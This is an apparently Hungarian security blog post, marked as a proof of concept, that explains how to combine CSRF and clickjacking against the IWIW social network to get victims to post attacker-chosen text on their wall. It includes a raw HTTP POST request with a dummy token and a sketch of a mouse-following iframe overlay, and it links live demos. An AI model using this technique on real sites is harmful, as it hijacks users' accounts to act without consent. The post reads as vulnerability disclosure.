IWIW CSRF + ClickJacking

január 13th, 2011 | 1 comment | PoC

Cél: másnak az “Üzenőfal”-ra írni egy általunk meghatározott szöveget.

A CSRF lenne a legkézenfekvőbb megoldás ere a célra,  jobban mondva az XSS de ez a bejegyzés most nem  erről szól, szóval CSRF: az IWIW nek van valamiféle CSRF védelme, ugyanis tokeneket használ szinte mindenhol,  a keresésnél, az üzenet küldésnél stb.

ClickJacking: kivitelezhető viszont rá kell vennünk a felhasználókat, hogy valamit “draggoljanak” legalább kétszer, egyszer amikor a mi szövegünket jelölik ki és egyszer amikor azt  átrakják az IWIW-be (lehet egyel is, de nem megbízható) majd kell még egy click a “Megosztás” – gombra, kivitelezhető csak eléggé macerás.

Nézzük meg jobban a CSRF-t, ha nem lenne a token egyszerű dolgunk lenne, viszont így sem hasztalan a technika:

POST /pages/activity/activities.jsp HTTP/1.1
Host: iwiw.hu
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.2.14) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: ajaxable=1; [.. COOKIEK... ] c_resource=WEB_1294970359_37374617; c_jsess=1294970359
Content-Type: multipart/form-data; boundary=---------------------------2735276561659
Content-Length: 570
-----------------------------2735276561659
Content-Disposition: form-data; name="token"
00000000000000000
-----------------------------2735276561659
Content-Disposition: form-data; name="redirect"

-----------------------------2735276561659
Content-Disposition: form-data; name="viewerGroup"
-1
-----------------------------2735276561659
Content-Disposition: form-data; name=""
-----------------------------2735276561659
Content-Disposition: form-data; name="comment"
Hello Word!
-----------------------------2735276561659--

Válaszként kapunk egy szép hiba üzenetet “Sikertelen üzenetküldés. Kérjük próbáld újra!” valamint egy kis segítséget:

<div class="commentWrapper">

	<textarea class="[...]" title="Mi jár a fejedben?" cols="30" rows="1" name="comment">

Hello Word!</textarea>

<div class="cornBot"></div>

</div>

Az egyik problémánk megoldódott, a szöveg már ott van a helyén csak annyi dolgunk van, hogy rávegyük a “usert”, hogy clickeljen a “Megosztás” – gombra, amit clickjackingel könnyedén megtehetjük

Vázlat:

[VALOS OLDAL]

XF.style.left = MOUSE.X -10
XF.style.top = MOUSE.y -10

[IFRAME ID="xf" SRC="SAJAT_DOMAINEN.html"] <-- Ezt az iframet lehet görgetni csak.
[IFRAME SRC="SAJAT_DOMAIN2.html" WIDTH=30 HEIGHT="60000" ]
[FORM POST IWIW]
[/FROM]
[JS POST FROM]
[/IFRAME]
[/IFRAME ]




[/VALOS OLDAL]

Live Demo : IWIW CSRF + ClickJacking PoC
Live Demo Látható IFRAME :IWIW CSRF + ClickJacking PoC

* Csak Firefox-ban működik tökéletesen, de a css-el játszódva könnyedén átihatjuk más böngészőre, és User Agent szerint szolgáljuk ki a “usert” a CSS-el.

One Comment

  1. ellenorizni kell:)

Leave a Comment